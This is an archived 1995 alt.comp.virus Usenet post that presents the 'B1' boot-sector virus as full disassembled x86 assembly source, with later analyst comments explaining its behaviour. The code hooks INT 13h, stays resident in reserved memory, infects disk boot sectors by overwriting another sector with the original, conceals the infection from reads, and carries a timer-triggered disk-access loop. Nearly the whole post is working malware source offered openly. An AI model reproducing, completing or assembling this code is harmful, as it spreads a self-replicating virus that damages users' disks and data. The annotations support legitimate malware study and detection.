Text File  |  1995-10-29  |  10.1 KB  |  349 lines

  1. Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
  2. From: danishm@iia.org ()
  3. Newsgroups: alt.comp.virus
  4. Subject: B1
  5. Date: 5 Feb 1995 22:05:37 GMT
  6. Organization: International Internet Association.
  7. Lines: 330
  8. Message-ID: <3h3i3h$v4@ankh.iia.org>
  9. NNTP-Posting-Host: iia.org
  10. X-Newsreader: TIN [version 1.2 PL2]
  11.  
  12. Here is the B1 virus:
  13.  
  14.   
  15. PAGE  59,132
  16. ; Disassembled using sourcer  
  17. ;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  18. ;[[                                                                      [[
  19. ;[[                             B1                                       [[
  20. ;[[                                                                      [[
  21. ;[[      Created:   8-Jan-95                                             [[
  22. ;[[      Version:                                                        [[
  23. ;[[      Code type: zero start                                           [[
  24. ;[[      Passes:    5          Analysis Options on: none                 [[
  25. ;[[                                                                      [[
  26. ;[[                                                                      [[
  27. ;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  28.   
  29. data_1e         equ     413h                    ; (0000:0413=7Fh) BIOS data area word: base memory size in KB
  30. data_2e         equ     46Dh                    ; (0000:046D=17E1h) word starting one byte into the BIOS timer tick count at 0000:046C
  31. data_3e         equ     4Ch                     ; (0006:004C=0DAh) 13h*4: interrupt-vector slot for INT 13h (disk services)
  32.   
  33. seg_a           segment byte public
  34.         assume  cs:seg_a, ds:seg_a
  35.   
  36.   
  37.         org     0                       ; all offsets below are relative to the start of the 512-byte sector image
  38.   
  39. virus           proc    far
        ; Analyst notes: a defensive reading of the Sourcer output, not assembled or run.
        ; Two entry points share this proc:
        ;   * 0000h, the boot entry: jumps over a BPB-shaped data area to loc_2 and
        ;     calls sub_1, the memory-resident installer (which never returns here);
        ;   * 0044h, the 'push ax' after that call: the offset sub_1 stores in the
        ;     INT 13h vector, i.e. the resident disk-service filter.
        ; The filter acts only on AH=02h/03h (read/write); every other function is
        ; chained to the saved original vector at loc_14.
        ; Frame after loc_3 (bp = sp): [bp+0]=bp [bp+2]=ds [bp+4]=di [bp+6]=si
        ; [bp+8]=es [bp+0Ah]=dx [bp+0Ch]=cx [bp+0Eh]=bx [bp+10h]=caller ax, followed
        ; by the interrupt frame [bp+12h]=ip [bp+14h]=cs [bp+16h]=flags.
        ; Detection-relevant behaviour visible in this listing: the base-memory word
        ; at 0000:0413 is decremented and the INT 13h vector repointed (sub_1);
        ; requests for cylinder 0 / head 0 / sector 1 of a marked disk are silently
        ; redirected to another sector, so a read through the hooked INT 13h does
        ; not show the sector that is really on disk.
  40.   
  41. start:
  42.         jmp     short loc_2             ; (0040) boot entry: skip the data area at 02h-3Fh
  43.         db       90h, 00h, 4Dh, 4Dh, 49h, 00h   ; 02h-3Fh is laid out like a DOS OEM-name/BPB area;
  44.         db       33h, 2Eh, 33h, 00h, 02h, 01h   ; read that way the values describe a 1.44 MB floppy
  45.         db       01h, 00h, 02h,0E0h, 00h, 40h   ; (512 B/sector, 2880 sectors, 18 sectors/track,
  46.         db       0Bh,0F0h, 09h, 00h, 12h, 00h   ; 2 heads) - presumably inherited from the sector
  47.         db       02h, 00h                       ; this sample was dumped from (sub_5 never copies 02h-3Fh)
  48.         db      19 dup (0)
  49.         db       12h, 00h, 00h, 00h, 00h, 01h
  50.         db       00h,0FAh, 33h,0C0h, 8Eh,0D0h   ; 0FAh.. decodes as cli / xor ax,ax / mov ss,ax /
  51.         db      0BCh, 00h, 7Ch, 16h, 07h        ; mov sp,7C00h / push ss / pop es; no branch in this listing reaches it
  52. loc_2:
  53.         push    cs                      ; boot path: segment half of the far return taken after loc_13
  54.         call    sub_1                   ; (00EF) installer; pops this return address and leaves via retf
  55.         push    ax                      ; offset 0044h = INT 13h filter entry; caller's ax ends up at [bp+10h]
  56.         shr     ax,1                    ; Shift w/zeros fill: ah = function/2, bit 0 of the function moves to bit 7 of al
  57.         dec     ah
  58.         jz      loc_3                   ; Jump if zero: only AH=02h (read) or 03h (write) get here
  59.         jmp     loc_14                  ; (01BA) any other function: chain to the original handler
  60. loc_3:
  61.         push    bx                      ; build the frame described in the header
  62.         push    cx
  63.         push    dx
  64.         push    es
  65.         push    si
  66.         push    di
  67.         push    ds
  68.         push    bp
  69.         mov     bp,sp
  70.         or      ch,ch                   ; Zero ? (low 8 bits of the requested cylinder)
  71.         jnz     loc_5                   ; Jump if not zero: other cylinders are passed through untouched
  72.         shl     al,1                    ; Shift w/zeros fill: CF = bit 0 of the original function (set for write)
  73.         jc      loc_4                   ; Jump if carry Set: writes skip the check-and-mark step
  74.         call    sub_6                   ; (0190) set up a 1-sector read of cyl 0/head 0/sector 1 into cs:0200h (dl = caller's drive)
  75.         call    sub_4                   ; (017B) issue it through the original handler
  76.         jc      loc_7                   ; Jump if carry Set: read failed, report that result to the caller
  77.         call    sub_2                   ; (0127) does the sector already carry this code at 40h-7Fh?
  78.         jz      loc_4                   ; Jump if zero: yes, nothing to write
  79.         call    sub_6                   ; (0190)
  80.         call    sub_3                   ; (013B) pick the sector that will hold the displaced original
  81.         jz      loc_5                   ; Jump if zero: no usable location, leave the disk alone
  82.         inc     ah                      ; 0201h -> 0301h (write one sector)
  83.         call    sub_4                   ; (017B) save the original sector at the location from sub_3
  84.         jc      loc_5                   ; Jump if carry Set: write failed, pass the request through
  85.         call    sub_5                   ; (0182) overlay resident bytes 00h-01h and 40h-1BBh onto the buffer
  86.         call    sub_6                   ; (0190)
  87.         inc     ah                      ; write again
  88.         call    sub_4                   ; (017B) modified buffer goes back to cyl 0/head 0/sector 1; result not checked
  89. loc_4:
  90.         call    sub_7                   ; (019E) reload the caller's request registers
  91.         or      ch,dh                   ; ch is 0 on this path, so ch = head
  92.         dec     cx
  93.         jnz     loc_5                   ; Jump if not zero: request is not for cyl 0/head 0/sector 1
  94.         call    sub_6                   ; (0190)
  95.         call    sub_4                   ; (017B) re-read the real first sector into cs:0200h
  96.         jc      loc_7                   ; Jump if carry Set
  97.         call    sub_2                   ; (0127)
  98.         jnz     loc_5                   ; Jump if not zero: sector is not marked, serve the request as asked
  99.         call    sub_7                   ; (019E)
  100.         call    sub_3                   ; (013B) cx/dh := location of the saved original; its ZF result is not tested here
  101.         dec     byte ptr [bp+10h]       ; saved al (sector count) minus one
  102.         jz      loc_6                   ; Jump if zero: one-sector request, run it against the saved copy
  103.         mov     al,1
  104.         call    sub_4                   ; (017B) first sector of a multi-sector request comes from the saved copy
  105.         jc      loc_7                   ; Jump if carry Set
  106.         call    sub_7                   ; (019E) caller's registers again; al now holds count-1
  107.         add     bx,di                   ; di is still 0200h from sub_2: advance the buffer by one sector
  108.         inc     cl                      ; remaining sectors start at sector 2
  109.         jmp     short loc_6             ; (00BA)
  110. loc_5:
  111.         call    sub_7                   ; (019E) pass-through: restore the request exactly as received
  112. loc_6:
  113.         call    sub_4                   ; (017B)
  114. loc_7:
  115.         pushf                           ; Push flags
  116.         pop     bx
  117.         mov     [bp+16h],bx             ; result flags replace the FLAGS image that iret restores
  118.         xchg    ax,[bp+10h]             ; result ax goes to the slot popped at loc_9; ax = saved request word
  119.         shr     ah,1                    ; Shift w/zeros fill: CF = bit 0 of the function (write)
  120.         jnc     loc_9                   ; Jump if carry=0: reads are finished
  121.         xor     ax,ax                   ; Zero register
  122.         mov     ds,ax
  123.         mov     ax,ds:data_2e           ; (0000:046D=17E1h)
  124.         and     ax,178Fh
  125.         jnz     loc_9                   ; Jump if not zero: continue only when all masked timer bits are clear
  126.         call    sub_6                   ; (0190) ax=0201h, cx=0001h, dh=0, es:bx=cs:0200h
  127. loc_8:
  128.         push    ax                      ; time-triggered loop: repeated one-sector reads on the caller's drive
  129.         call    sub_4                   ; (017B)
  130.         xor     cx,0FFC0h               ; flips ch and the top two bits of cl (the cylinder bits of an INT 13h request)
  131.         nop                             ;*ASM fixup - sign extn byte
  132.         shl     ax,1                    ; Shift w/zeros fill: CF = bit 7 of the returned status in ah
  133.         pop     ax
  134.         jnc     loc_8                   ; Jump if carry=0: repeat until a status with bit 7 set comes back
  135. loc_9:
  136.         pop     bp
  137.         pop     ds
  138.         pop     di
  139.         pop     si
  140.         pop     es
  141.         pop     dx
  142.         pop     cx
  143.         pop     bx
  144.         pop     ax                      ; result ax stored at loc_7
  145.         iret                            ; Interrupt return
  146.   
  147. virus           endp
  148.   
  149. ;__________________________________________________________________________
  150. ;                              SUBROUTINE
  151. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  152.   
  153. sub_1           proc    near
        ; Boot-time installer, reached once from loc_2 with cs already pushed.
        ; It reserves 1 KB at the top of base memory, copies the code there, saves
        ; the current INT 13h vector at offset 01BCh of the copy, repoints the
        ; vector at copy:0044h and far-returns into the copy at 01AEh.
        ; Its own return address is popped and used only to find the image base.
        ; Forensic indicators: base-memory word at 0000:0413 one KB lower than
        ; installed RAM, INT 13h vector (0000:004C) pointing into that reserved KB.
  154.         mov     bx,44h                  ; offset of the filter entry, and of the return address within the image
  155.         mov     dx,80h                  ; head 0, drive 80h for the read at loc_13
  156.         mov     si,data_1e              ; (0000:0413=7Fh)
  157.         xor     di,di                   ; Zero register
  158.         mov     ds,di
  159.         dec     word ptr [si]           ; base-memory size shrinks by 1 KB
  160.         lodsw                           ; String [si] to ax: ax = new size in KB
  161.         pop     si                      ; return address = image base + 44h
  162.         mov     cl,6
  163.         shl     ax,cl                   ; Shift w/zeros fill: KB*64 = segment of the reserved KB
  164.         mov     es,ax
  165.         sub     si,bx                   ; si = offset of the running sector image
  166.         push    si                      ; offset for the final retf at loc_13
  167.         push    ax                      ; segment for this proc's retf
  168.         mov     ax,1AEh
  169.         push    ax                      ; offset for this proc's retf
  170.         push    cs                      ; popped into es below
  171.         push    si                      ; popped into bx below
  172.         push    cs
  173.         pop     ds
  174.         call    sub_5                   ; (0182) copy bytes 00h-01h and 40h-1BBh to es:0; leaves di=01BCh, cx=0
  175.         mov     ds,cx                   ; ds = 0
  176.         mov     si,data_3e              ; (0006:004C=0DAh)
  177.         mov     cl,2
  178.         rep     movsw                   ; Rep when cx >0 Mov [si] to es:[di]: original INT 13h vector -> es:01BCh
  179.         mov     [si-4],bx               ; si is now 50h: vector offset := 0044h
  180.         mov     [si-2],es               ; vector segment := reserved KB
  181.         pop     bx                      ; bx = image base offset
  182.         pop     es                      ; es = boot-time cs; es:bx is the buffer loc_13 reads into
  183.         retf                            ; Return far: to reserved-KB:01AEh, the 41h byte just before loc_13
  184. sub_1           endp
  185.   
  186.   
  187. ;__________________________________________________________________________
  188. ;                              SUBROUTINE
  189. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  190.   
  191. sub_2           proc    near
        ; Self-recognition check: compares 40h bytes of the resident copy (cs:0040h)
        ; with the same offsets of the sector buffer at es:bx.
        ; Out: ZF=1 when all bytes match. Leaves ds=cs, si=0, di=bx for the callers.
        ; Only cl is loaded, so this relies on ch being 0 on entry - callers arrive
        ; from sub_6 (cx=0001h); assumes the chained handler preserved cx.
        ; The compared range, image bytes 40h-7Fh, is what the code itself treats
        ; as its signature.
  192.         cld                             ; Clear direction
  193.         push    cs
  194.         pop     ds
  195.         xor     si,si                   ; Zero register
  196.         mov     di,bx
  197.         mov     cl,40h                  ; '@'
  198.         push    si
  199.         push    di
  200.         add     si,cx                   ; both pointers skip the first 40h bytes
  201.         add     di,cx
  202.         repe    cmpsb                   ; Rep zf=1+cx >0 Cmp [si] to es:[di]
  203.         pop     di                      ; pops leave the flags from cmpsb intact
  204.         pop     si
  205.         retn
  206. sub_2           endp
  207.   
  208.   
  209. ;__________________________________________________________________________
  210. ;                              SUBROUTINE
  211. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  212.   
  213. sub_3           proc    near
        ; Chooses the sector used to hold the displaced original first sector.
        ; In:  dl = drive, di = sector buffer (callers leave di=0200h via sub_2).
        ; Out: cx/dh = cylinder/sector/head in INT 13h form; ZF=1 with cx=0 when no
        ;      location could be computed. ax is preserved.
        ; Drives with bit 7 set (hard disks): fixed cylinder 0, head 0, sector 17.
        ; Other drives: computed from the buffer's fields at +11h, +16h, +18h, +1Ah,
        ; which in the standard DOS BPB are root entries, sectors per FAT, sectors
        ; per track and heads. The sum works out to the last root-directory sector
        ; if the disk has one reserved sector and two FATs - TODO confirm.
        ; Whatever was stored in the chosen sector is overwritten by the caller.
  214.         push    ax
  215.         xor     dh,dh                   ; Zero register
  216.         test    dl,80h
  217.         jz      loc_10                  ; Jump if zero
  218.         mov     cx,11h                  ; cylinder 0, sector 17; ZF stays clear from the test above
  219.         jmp     short loc_11            ; (0175)
  220. loc_10:
  221.         mov     ax,[di+11h]
  222.         mov     cl,4
  223.         shr     ax,cl                   ; Shift w/zeros fill: entries/16 = root-directory sectors (32-byte entries, 512-byte sectors)
  224.         mov     cx,ax
  225.         mov     ax,[di+16h]
  226.         shl     ax,1                    ; Shift w/zeros fill: FAT size doubled
  227.         jc      loc_12                  ; Jump if carry Set
  228.         add     ax,cx
  229.         jc      loc_12                  ; Jump if carry Set
  230.         xor     cx,cx                   ; Zero register
  231.         cmp     ah,[di+18h]
  232.         jae     loc_12                  ; Jump if above or =: quotient would not fit in al (also catches a zero divisor)
  233.         div     byte ptr [di+18h]       ; al,ah rem = ax/data
  234.         xchg    cl,ah                   ; cl = zero-based sector within the track, ah = 0
  235.         cmp     ah,[di+1Ah]
  236.         jae     loc_12                  ; Jump if above or =: ah is 0, so this is taken only for a zero divisor
  237.         div     byte ptr [di+1Ah]       ; al,ah rem = ax/data
  238.         mov     ch,al                   ; cylinder
  239.         mov     dh,ah                   ; head
  240.         inc     cx                      ; sector numbers are 1-based; also leaves ZF clear
  241. loc_11:
  242.         pop     ax
  243.         retn
  244. loc_12:
  245.         xor     cx,cx                   ; Zero register: failure, ZF=1
  246.         jmp     short loc_11            ; (0175)
  247. sub_3           endp
  248.   
  249.   
  250. ;__________________________________________________________________________
  251. ;                              SUBROUTINE
  252. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  253.   
  254. sub_4           proc    near
        ; Calls the original INT 13h handler: pushf plus a far call through the
        ; pointer saved at cs:01BCh by sub_1 builds the frame that handler's iret expects.
        ; Registers in and out are those of the INT 13h request; returns the
        ; handler's ax and flags.
  255.         pushf                           ; Push flags
  256.         call    dword ptr cs:[1BCh]     ; (7379:01BC=0D79h)
  257.         retn
  258. sub_4           endp
  259.   
  260.   
  261. ;__________________________________________________________________________
  262. ;                              SUBROUTINE
  263. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  264.   
  265. sub_5           proc    near
        ; Copies the code portion of the image from ds:si to es:di: the first two
        ; bytes (the short jmp), then 17Ch bytes starting 40h into the image.
        ; Destination bytes 02h-3Fh and 1BCh onward are left as they were.
        ; Out: si and di advanced by 1BCh, cx = 0.
  266.         cld                             ; Clear direction
  267.         movsw                           ; Mov [si] to es:[di]
  268.         mov     cx,17Ch
  269.         add     si,3Eh                  ; skip the data area at 02h-3Fh
  270.         add     di,3Eh
  271.         rep     movsb                   ; Rep when cx >0 Mov [si] to es:[di]
  272.         retn
  273. sub_5           endp
  274.   
  275.   
  276. ;__________________________________________________________________________
  277. ;                              SUBROUTINE
  278. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  279.   
  280. sub_6           proc    near
        ; Loads the registers for a one-sector INT 13h read of cylinder 0, head 0,
        ; sector 1 into cs:0200h. dl (drive) is left as the caller had it.
        ; Out: ax=0201h, bx=0200h, cx=0001h, dh=0, es=cs.
  281.         push    cs
  282.         mov     ax,200h
  283.         mov     bx,ax
  284.         xor     cx,cx                   ; Zero register
  285.         xor     dh,dh                   ; Zero register
  286.         inc     cx
  287.         inc     ax
  288.         pop     es
  289.         retn
  290. sub_6           endp
  291.   
  292.   
  293. ;__________________________________________________________________________
  294. ;                              SUBROUTINE
  295. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  296.   
  297. sub_7           proc    near
        ; Reloads ax, bx, cx, dx and es from the frame built at loc_3, i.e. the
        ; registers of the intercepted request. bp must still point at that frame.
        ; [bp+10h] may have been decremented by the handler since it was saved.
  298.         mov     ax,[bp+10h]
  299.         mov     bx,[bp+0Eh]
  300.         mov     cx,[bp+0Ch]
  301.         mov     dx,[bp+0Ah]
  302.         mov     es,[bp+8]
  303.         retn
  304. sub_7           endp
  305.   
  306.         db      41h                     ; Inc   cx   ? - by the byte count this is offset 01AEh, where sub_1's retf lands: cx 0 -> 1
        ; loc_13: boot continuation, running from the resident copy. Reads sector 1
        ; of cylinder 0 / head 0 into es:bx (set by sub_1) first from drive 80h, then
        ; from drive 00h, through the vector sub_1 has just repointed. Both reads
        ; use the same buffer and neither status is checked. The retf then consumes
        ; the offset and segment left on the stack by sub_1 and loc_2 and transfers
        ; control to the loaded sector.
  307. loc_13:
  308.         mov     ax,201h
  309.         int     13h                     ; Disk  dl=drive a  ah=func 02h
  310.                         ;  read sectors to memory es:bx
  311.         xor     dl,80h
  312.         jz      loc_13                  ; Jump if zero: taken once, after the drive 80h pass
  313.         retf                            ; Return far
  314. loc_14:
  315.         pop     ax                      ; undo the push at offset 0044h before chaining
  316. ;*              jmp     far ptr loc_1           ;*(000A:0D79)
  317.         db      0EAh, 79h, 0Dh, 0Ah, 00h        ; far jmp; its 4-byte operand sits at 01BCh, where sub_1 stores the original INT 13h vector
  318.         db      0Dh, 0Ah, 'Disk Boot failure', 0Dh     ; text from 01C0h on lies outside the range sub_5 copies -
  319.         db      0Ah, 0                                 ; presumably left over from the host boot sector
  320.         db      'IBMBIO  COMIBMDOS  COM'
  321.         db      18 dup (0)
  322.         db       55h,0AAh               ; boot-sector signature at 01FEh
  323.   
  324. seg_a           ends
  325.   
  326.   
  327.   
  328.         end     start
  329.  
  330. ls virus.asm
  331.  
  332.  
  333.  
  334. ls virus.asm
  335.  
  336.  
  337.  
  338.  
  339.  
  340.  
  341.  
  342.  
  343. --
  344. Eric "Mad Dog" Kilby                                 maddog@ccs.neu.edu
  345. The Great Sporkeus Maximus                 ekilby@lynx.dac.neu.edu
  346. Student at the Northeastern University College of Computer Science 
  347. "I Can't Believe It's Not Butter"
  348.  
  349.